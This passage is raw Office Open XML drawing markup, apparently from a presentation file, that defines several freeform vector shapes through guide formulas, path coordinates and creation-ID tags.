                  <a:gd name="T80" fmla="*/ 110 w 202"/>
                  <a:gd name="T81" fmla="*/ 69 h 162"/>
                  <a:gd name="T82" fmla="*/ 100 w 202"/>
                  <a:gd name="T83" fmla="*/ 68 h 162"/>
                  <a:gd name="T84" fmla="*/ 57 w 202"/>
                  <a:gd name="T85" fmla="*/ 74 h 162"/>
                  <a:gd name="T86" fmla="*/ 45 w 202"/>
                  <a:gd name="T87" fmla="*/ 75 h 162"/>
                  <a:gd name="T88" fmla="*/ 50 w 202"/>
                  <a:gd name="T89" fmla="*/ 97 h 162"/>
                  <a:gd name="T90" fmla="*/ 50 w 202"/>
                  <a:gd name="T91" fmla="*/ 108 h 162"/>
                  <a:gd name="T92" fmla="*/ 48 w 202"/>
                  <a:gd name="T93" fmla="*/ 121 h 162"/>
                  <a:gd name="T94" fmla="*/ 45 w 202"/>
                  <a:gd name="T95" fmla="*/ 139 h 162"/>
                  <a:gd name="T96" fmla="*/ 45 w 202"/>
                  <a:gd name="T97" fmla="*/ 156 h 162"/>
                  <a:gd name="T98" fmla="*/ 35 w 202"/>
                  <a:gd name="T99" fmla="*/ 158 h 162"/>
                  <a:gd name="T100" fmla="*/ 22 w 202"/>
                  <a:gd name="T101" fmla="*/ 160 h 162"/>
                  <a:gd name="T102" fmla="*/ 11 w 202"/>
                  <a:gd name="T103" fmla="*/ 161 h 162"/>
                  <a:gd name="T104" fmla="*/ 0 w 202"/>
                  <a:gd name="T105" fmla="*/ 159 h 162"/>
                  <a:gd name="T106" fmla="*/ 0 w 202"/>
                  <a:gd name="T107" fmla="*/ 143 h 162"/>
                  <a:gd name="T108" fmla="*/ 0 w 202"/>
                  <a:gd name="T109" fmla="*/ 117 h 162"/>
                  <a:gd name="T110" fmla="*/ 0 w 202"/>
                  <a:gd name="T111" fmla="*/ 94 h 162"/>
                  <a:gd name="T112" fmla="*/ 0 w 202"/>
                  <a:gd name="T113" fmla="*/ 90 h 16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2"/>
                  <a:gd name="T172" fmla="*/ 0 h 162"/>
                  <a:gd name="T173" fmla="*/ 202 w 202"/>
                  <a:gd name="T174" fmla="*/ 162 h 16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2" h="162">
                    <a:moveTo>
                      <a:pt x="0" y="90"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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6" name="Freeform 121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BB1495-2B93-43C1-9CE2-FDBBDD65C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" y="2368"/>
                <a:ext cx="195" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 195"/>
                  <a:gd name="T1" fmla="*/ 7 h 153"/>
                  <a:gd name="T2" fmla="*/ 193 w 195"/>
                  <a:gd name="T3" fmla="*/ 16 h 153"/>
                  <a:gd name="T4" fmla="*/ 189 w 195"/>
                  <a:gd name="T5" fmla="*/ 41 h 153"/>
                  <a:gd name="T6" fmla="*/ 178 w 195"/>
                  <a:gd name="T7" fmla="*/ 41 h 153"/>
                  <a:gd name="T8" fmla="*/ 166 w 195"/>
                  <a:gd name="T9" fmla="*/ 51 h 153"/>
                  <a:gd name="T10" fmla="*/ 138 w 195"/>
                  <a:gd name="T11" fmla="*/ 57 h 153"/>
                  <a:gd name="T12" fmla="*/ 112 w 195"/>
                  <a:gd name="T13" fmla="*/ 57 h 153"/>
                  <a:gd name="T14" fmla="*/ 122 w 195"/>
                  <a:gd name="T15" fmla="*/ 49 h 153"/>
                  <a:gd name="T16" fmla="*/ 109 w 195"/>
                  <a:gd name="T17" fmla="*/ 57 h 153"/>
                  <a:gd name="T18" fmla="*/ 97 w 195"/>
                  <a:gd name="T19" fmla="*/ 60 h 153"/>
                  <a:gd name="T20" fmla="*/ 106 w 195"/>
                  <a:gd name="T21" fmla="*/ 54 h 153"/>
                  <a:gd name="T22" fmla="*/ 91 w 195"/>
                  <a:gd name="T23" fmla="*/ 60 h 153"/>
                  <a:gd name="T24" fmla="*/ 47 w 195"/>
                  <a:gd name="T25" fmla="*/ 65 h 153"/>
                  <a:gd name="T26" fmla="*/ 45 w 195"/>
                  <a:gd name="T27" fmla="*/ 95 h 153"/>
                  <a:gd name="T28" fmla="*/ 40 w 195"/>
                  <a:gd name="T29" fmla="*/ 148 h 153"/>
                  <a:gd name="T30" fmla="*/ 15 w 195"/>
                  <a:gd name="T31" fmla="*/ 152 h 153"/>
                  <a:gd name="T32" fmla="*/ 0 w 195"/>
                  <a:gd name="T33" fmla="*/ 115 h 153"/>
                  <a:gd name="T34" fmla="*/ 3 w 195"/>
                  <a:gd name="T35" fmla="*/ 66 h 153"/>
                  <a:gd name="T36" fmla="*/ 2 w 195"/>
                  <a:gd name="T37" fmla="*/ 44 h 153"/>
                  <a:gd name="T38" fmla="*/ 15 w 195"/>
                  <a:gd name="T39" fmla="*/ 29 h 153"/>
                  <a:gd name="T40" fmla="*/ 54 w 195"/>
                  <a:gd name="T41" fmla="*/ 17 h 153"/>
                  <a:gd name="T42" fmla="*/ 86 w 195"/>
                  <a:gd name="T43" fmla="*/ 11 h 153"/>
                  <a:gd name="T44" fmla="*/ 107 w 195"/>
                  <a:gd name="T45" fmla="*/ 23 h 153"/>
                  <a:gd name="T46" fmla="*/ 92 w 195"/>
                  <a:gd name="T47" fmla="*/ 15 h 153"/>
                  <a:gd name="T48" fmla="*/ 91 w 195"/>
                  <a:gd name="T49" fmla="*/ 9 h 153"/>
                  <a:gd name="T50" fmla="*/ 97 w 195"/>
                  <a:gd name="T51" fmla="*/ 11 h 153"/>
                  <a:gd name="T52" fmla="*/ 107 w 195"/>
                  <a:gd name="T53" fmla="*/ 16 h 153"/>
                  <a:gd name="T54" fmla="*/ 98 w 195"/>
                  <a:gd name="T55" fmla="*/ 7 h 153"/>
                  <a:gd name="T56" fmla="*/ 106 w 195"/>
                  <a:gd name="T57" fmla="*/ 4 h 153"/>
                  <a:gd name="T58" fmla="*/ 119 w 195"/>
                  <a:gd name="T59" fmla="*/ 13 h 153"/>
                  <a:gd name="T60" fmla="*/ 109 w 195"/>
                  <a:gd name="T61" fmla="*/ 2 h 153"/>
                  <a:gd name="T62" fmla="*/ 115 w 195"/>
                  <a:gd name="T63" fmla="*/ 0 h 153"/>
                  <a:gd name="T64" fmla="*/ 125 w 195"/>
                  <a:gd name="T65" fmla="*/ 7 h 153"/>
                  <a:gd name="T66" fmla="*/ 143 w 195"/>
                  <a:gd name="T67" fmla="*/ 5 h 153"/>
                  <a:gd name="T68" fmla="*/ 148 w 195"/>
                  <a:gd name="T69" fmla="*/ 7 h 153"/>
                  <a:gd name="T70" fmla="*/ 166 w 195"/>
                  <a:gd name="T71" fmla="*/ 10 h 153"/>
                  <a:gd name="T72" fmla="*/ 169 w 195"/>
                  <a:gd name="T73" fmla="*/ 5 h 153"/>
                  <a:gd name="T74" fmla="*/ 177 w 195"/>
                  <a:gd name="T75" fmla="*/ 10 h 153"/>
                  <a:gd name="T76" fmla="*/ 184 w 195"/>
                  <a:gd name="T77" fmla="*/ 5 h 15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153"/>
                  <a:gd name="T119" fmla="*/ 195 w 195"/>
                  <a:gd name="T120" fmla="*/ 153 h 15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153">
                    <a:moveTo>
                      <a:pt x="188" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="188" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="2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7" name="Freeform 122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D67FD7-3FCE-4C0F-9A76-0A457AD62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" y="2394"/>
                <a:ext cx="22" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 22"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 11 w 22"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 22"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 21 w 22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"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 22 w 22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" h="17">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21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8" name="Freeform 123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD030D29-20BA-4647-8734-4F34DD494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238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1 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 12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1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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59" name="Freeform 124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA57CF75-DA1F-4E17-B391-A076CF73A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383"/>
                <a:ext cx="25" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 13 w 25"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 11 w 25"/>
                  <a:gd name="T5" fmla="*/ 3 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 25"/>
                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                  <a:gd name="T8" fmla="*/ 10 w 25"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 25"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 12 w 25"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 25"/>
                  <a:gd name="T15" fmla="*/ 4 h 17"/>
                  <a:gd name="T16" fmla="*/ 24 w 25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17"/>
                  <a:gd name="T29" fmla="*/ 25 w 25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17">
                    <a:moveTo>
                      <a:pt x="24" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4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0" name="Freeform 125">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D73EE1A-7272-4217-AA6E-E2C35403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410"/>
                <a:ext cx="81" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 81"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 59 w 81"/>
                  <a:gd name="T3" fmla="*/ 0 h 17"/>
                  <a:gd name="T4" fmla="*/ 39 w 81"/>
                  <a:gd name="T5" fmla="*/ 4 h 17"/>
                  <a:gd name="T6" fmla="*/ 23 w 81"/>
                  <a:gd name="T7" fmla="*/ 5 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 81"/>
                  <a:gd name="T9" fmla="*/ 7 h 17"/>
                  <a:gd name="T10" fmla="*/ 5 w 81"/>
                  <a:gd name="T11" fmla="*/ 12 h 17"/>
                  <a:gd name="T12" fmla="*/ 0 w 81"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 5 w 81"/>
                  <a:gd name="T15" fmla="*/ 15 h 17"/>
                  <a:gd name="T16" fmla="*/ 11 w 81"/>
                  <a:gd name="T17" fmla="*/ 8 h 17"/>
                  <a:gd name="T18" fmla="*/ 28 w 81"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 39 w 81"/>
                  <a:gd name="T21" fmla="*/ 7 h 17"/>
                  <a:gd name="T22" fmla="*/ 46 w 81"/>
                  <a:gd name="T23" fmla="*/ 4 h 17"/>
                  <a:gd name="T24" fmla="*/ 60 w 81"/>
                  <a:gd name="T25" fmla="*/ 2 h 17"/>
                  <a:gd name="T26" fmla="*/ 80 w 81"/>
                  <a:gd name="T27" fmla="*/ 0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1"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 81 w 81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1" h="17">
                    <a:moveTo>
                      <a:pt x="80" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12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11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2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1" name="Freeform 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94331818-F741-44DC-A890-4133B7950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171"/>
                <a:ext cx="69" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 69"/>
                  <a:gd name="T1" fmla="*/ 2 h 69"/>
                  <a:gd name="T2" fmla="*/ 15 w 69"/>
                  <a:gd name="T3" fmla="*/ 6 h 69"/>
                  <a:gd name="T4" fmla="*/ 13 w 69"/>
                  <a:gd name="T5" fmla="*/ 10 h 69"/>
                  <a:gd name="T6" fmla="*/ 9 w 69"/>
                  <a:gd name="T7" fmla="*/ 16 h 69"/>
                  <a:gd name="T8" fmla="*/ 8 w 69"/>
                  <a:gd name="T9" fmla="*/ 18 h 69"/>
                  <a:gd name="T10" fmla="*/ 8 w 69"/>
                  <a:gd name="T11" fmla="*/ 21 h 69"/>
                  <a:gd name="T12" fmla="*/ 9 w 69"/>
                  <a:gd name="T13" fmla="*/ 25 h 69"/>
                  <a:gd name="T14" fmla="*/ 6 w 69"/>
                  <a:gd name="T15" fmla="*/ 28 h 69"/>
                  <a:gd name="T16" fmla="*/ 2 w 69"/>
                  <a:gd name="T17" fmla="*/ 35 h 69"/>
                  <a:gd name="T18" fmla="*/ 0 w 69"/>
                  <a:gd name="T19" fmla="*/ 39 h 69"/>
                  <a:gd name="T20" fmla="*/ 0 w 69"/>
                  <a:gd name="T21" fmla="*/ 40 h 69"/>
                  <a:gd name="T22" fmla="*/ 0 w 69"/>
                  <a:gd name="T23" fmla="*/ 41 h 69"/>
                  <a:gd name="T24" fmla="*/ 2 w 69"/>
                  <a:gd name="T25" fmla="*/ 41 h 69"/>
                  <a:gd name="T26" fmla="*/ 5 w 69"/>
                  <a:gd name="T27" fmla="*/ 42 h 69"/>
                  <a:gd name="T28" fmla="*/ 6 w 69"/>
                  <a:gd name="T29" fmla="*/ 42 h 69"/>
                  <a:gd name="T30" fmla="*/ 6 w 69"/>
                  <a:gd name="T31" fmla="*/ 45 h 69"/>
                  <a:gd name="T32" fmla="*/ 5 w 69"/>
                  <a:gd name="T33" fmla="*/ 49 h 69"/>
                  <a:gd name="T34" fmla="*/ 7 w 69"/>
                  <a:gd name="T35" fmla="*/ 51 h 69"/>
                  <a:gd name="T36" fmla="*/ 6 w 69"/>
                  <a:gd name="T37" fmla="*/ 53 h 69"/>
                  <a:gd name="T38" fmla="*/ 8 w 69"/>
                  <a:gd name="T39" fmla="*/ 54 h 69"/>
                  <a:gd name="T40" fmla="*/ 9 w 69"/>
                  <a:gd name="T41" fmla="*/ 60 h 69"/>
                  <a:gd name="T42" fmla="*/ 11 w 69"/>
                  <a:gd name="T43" fmla="*/ 61 h 69"/>
                  <a:gd name="T44" fmla="*/ 15 w 69"/>
                  <a:gd name="T45" fmla="*/ 61 h 69"/>
                  <a:gd name="T46" fmla="*/ 19 w 69"/>
                  <a:gd name="T47" fmla="*/ 60 h 69"/>
                  <a:gd name="T48" fmla="*/ 24 w 69"/>
                  <a:gd name="T49" fmla="*/ 60 h 69"/>
                  <a:gd name="T50" fmla="*/ 24 w 69"/>
                  <a:gd name="T51" fmla="*/ 68 h 69"/>
                  <a:gd name="T52" fmla="*/ 60 w 69"/>
                  <a:gd name="T53" fmla="*/ 57 h 69"/>
                  <a:gd name="T54" fmla="*/ 57 w 69"/>
                  <a:gd name="T55" fmla="*/ 51 h 69"/>
                  <a:gd name="T56" fmla="*/ 58 w 69"/>
                  <a:gd name="T57" fmla="*/ 46 h 69"/>
                  <a:gd name="T58" fmla="*/ 68 w 69"/>
                  <a:gd name="T59" fmla="*/ 37 h 69"/>
                  <a:gd name="T60" fmla="*/ 68 w 69"/>
                  <a:gd name="T61" fmla="*/ 13 h 69"/>
                  <a:gd name="T62" fmla="*/ 61 w 69"/>
                  <a:gd name="T63" fmla="*/ 6 h 69"/>
                  <a:gd name="T64" fmla="*/ 53 w 69"/>
                  <a:gd name="T65" fmla="*/ 2 h 69"/>
                  <a:gd name="T66" fmla="*/ 44 w 69"/>
                  <a:gd name="T67" fmla="*/ 0 h 69"/>
                  <a:gd name="T68" fmla="*/ 32 w 69"/>
                  <a:gd name="T69" fmla="*/ 1 h 69"/>
                  <a:gd name="T70" fmla="*/ 22 w 69"/>
                  <a:gd name="T71" fmla="*/ 2 h 6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9"/>
                  <a:gd name="T109" fmla="*/ 0 h 69"/>
                  <a:gd name="T110" fmla="*/ 69 w 69"/>
                  <a:gd name="T111" fmla="*/ 69 h 6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9" h="69">
                    <a:moveTo>
                      <a:pt x="22" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
